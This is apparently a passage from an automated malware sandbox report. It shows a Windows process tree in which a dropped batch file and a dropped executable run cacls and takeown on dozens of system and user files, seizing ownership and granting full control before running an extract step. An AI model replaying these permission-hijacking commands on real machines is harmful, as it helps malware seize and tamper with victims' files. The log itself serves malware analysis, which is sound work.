C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe"3⤵
- Modifies file permissions
PID:4640
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "GoogleUpdateSetup.exe" -nobanner3⤵PID:4552
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "GoogleUpdateSetup.exe" -nobanner4⤵
- Executes dropped EXE
PID:4336
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4132
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:4484
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:4608
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:4008
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4804
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5100
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""2⤵PID:268
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:4100
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4500
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "wab.exe" -nobanner3⤵PID:2196
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "wab.exe" -nobanner4⤵
- Executes dropped EXE
PID:4280
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5040
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui""2⤵PID:4884
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:4288
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:2268
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "WinMail.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:5064
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4648
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files (x86)\Windows Mail\WinMail.exe""2⤵PID:2192
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\WinMail.exe" /E /G Admin:F /C3⤵PID:276
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\WinMail.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "WinMail.exe" -nobanner3⤵PID:4420
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "WinMail.exe" -nobanner4⤵
- Executes dropped EXE
PID:3780
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4708
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵PID:4360
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵PID:4496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵
- Modifies file permissions
PID:5116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵PID:4848
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵
- Executes dropped EXE
PID:5044
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5020
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵PID:4104
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:2200
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
PID:4732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:2224
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4284
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4692
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""2⤵PID:4516
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:5088
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui"3⤵
- Modifies file permissions
PID:4960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:2136
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "msoeres.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4180
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4348
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:264
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:4112
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Modifies file permissions
PID:4240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:4128
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "ImagingDevices.exe" -nobanner4⤵PID:4688
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4920
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵PID:260
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:4188
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵
- Modifies file permissions
PID:4924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "Workflow.Targets" -nobanner3⤵PID:4120
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "Workflow.Targets" -nobanner4⤵PID:4996
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5140
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:5164
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:5212
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
PID:5232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:5252
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:5268
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5292
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""2⤵PID:5316
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:5364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"3⤵
- Modifies file permissions
PID:5384
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "wabmig.exe" -nobanner3⤵PID:5408
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "wabmig.exe" -nobanner4⤵PID:5424
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5444
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""2⤵PID:5468
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C3⤵PID:5516
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"3⤵
- Modifies file permissions
PID:5536
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "KnownGameList.bin" -nobanner3⤵PID:5556
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "KnownGameList.bin" -nobanner4⤵PID:5572
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5596
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat""2⤵PID:5620
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C3⤵PID:5668
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat"3⤵
- Modifies file permissions
PID:5688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "settings.dat" -nobanner3⤵PID:5708
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "settings.dat" -nobanner4⤵PID:5724
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5748
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin""2⤵PID:5772
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin" /E /G Admin:F /C3⤵PID:5820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin"3⤵
- Modifies file permissions
PID:5840
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "TileCache_100_0_Header.bin" -nobanner3⤵PID:5860
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "TileCache_100_0_Header.bin" -nobanner4⤵PID:5876
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5900
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:5924
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:5972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵
- Modifies file permissions
PID:5992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "background.png" -nobanner3⤵PID:6012
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "background.png" -nobanner4⤵PID:6028
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6052
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json""2⤵PID:6076
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json" /E /G Admin:F /C3⤵PID:6124
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json"3⤵
- Modifies file permissions
PID:5124
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "utc.tracing.json" -nobanner3⤵PID:5132
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "utc.tracing.json" -nobanner4⤵PID:5160
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4292
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""2⤵PID:5180
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C3⤵PID:5288
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"3⤵
- Modifies file permissions
PID:5300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner3⤵PID:5204
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner4⤵PID:5168
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5332
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat""2⤵PID:5400
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C3⤵PID:5464
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat"3⤵
- Modifies file permissions
PID:5348
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "settings.dat" -nobanner3⤵PID:5336
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "settings.dat" -nobanner4⤵PID:5524
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5552
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb""2⤵PID:5584
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb" /E /G Admin:F /C3⤵PID:5512
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb"3⤵
- Modifies file permissions
PID:5504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "vedatamodel.edb" -nobanner3⤵PID:5676
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "vedatamodel.edb" -nobanner4⤵PID:5696
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl""2⤵PID:5756
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl" /E /G Admin:F /C3⤵PID:5640
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl"3⤵
- Modifies file permissions
PID:5836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "AutoLogger-Diagtrack-Listener.etl" -nobanner3⤵PID:5844
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "AutoLogger-Diagtrack-Listener.etl" -nobanner4⤵PID:5888
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5908
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm""2⤵PID:5816
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm" /E /G Admin:F /C3⤵PID:5984
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm"3⤵
- Modifies file permissions
PID:5996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "qmgr.jfm" -nobanner3⤵PID:6048
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "qmgr.jfm" -nobanner4⤵PID:6060
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5952
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""2⤵PID:5944
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C3⤵PID:5144
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"3⤵
- Modifies file permissions
PID:5152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner3⤵PID:5172
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner4⤵PID:6120
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:5264
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:5208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵
- Modifies file permissions
PID:5380
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "overlay.png" -nobanner3⤵PID:5276
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "overlay.png" -nobanner4⤵PID:5240
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5360
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:5476
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:5452
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵
- Modifies file permissions
PID:5420
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "device.png" -nobanner3⤵PID:5508
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "device.png" -nobanner4⤵PID:5480
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5700
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json""2⤵PID:5740
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json" /E /G Admin:F /C3⤵PID:5560
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json"3⤵
- Modifies file permissions
PID:5828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "utc.app.json" -nobanner3⤵PID:5824
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "utc.app.json" -nobanner4⤵PID:5892
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5920
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm""2⤵PID:5660
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm" /E /G Admin:F /C3⤵PID:6008
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm"3⤵
- Modifies file permissions
PID:6040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "SmsInterceptStore.jfm" -nobanner3⤵PID:6056
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "SmsInterceptStore.jfm" -nobanner4⤵PID:5956
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5988
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs""2⤵PID:5808
-
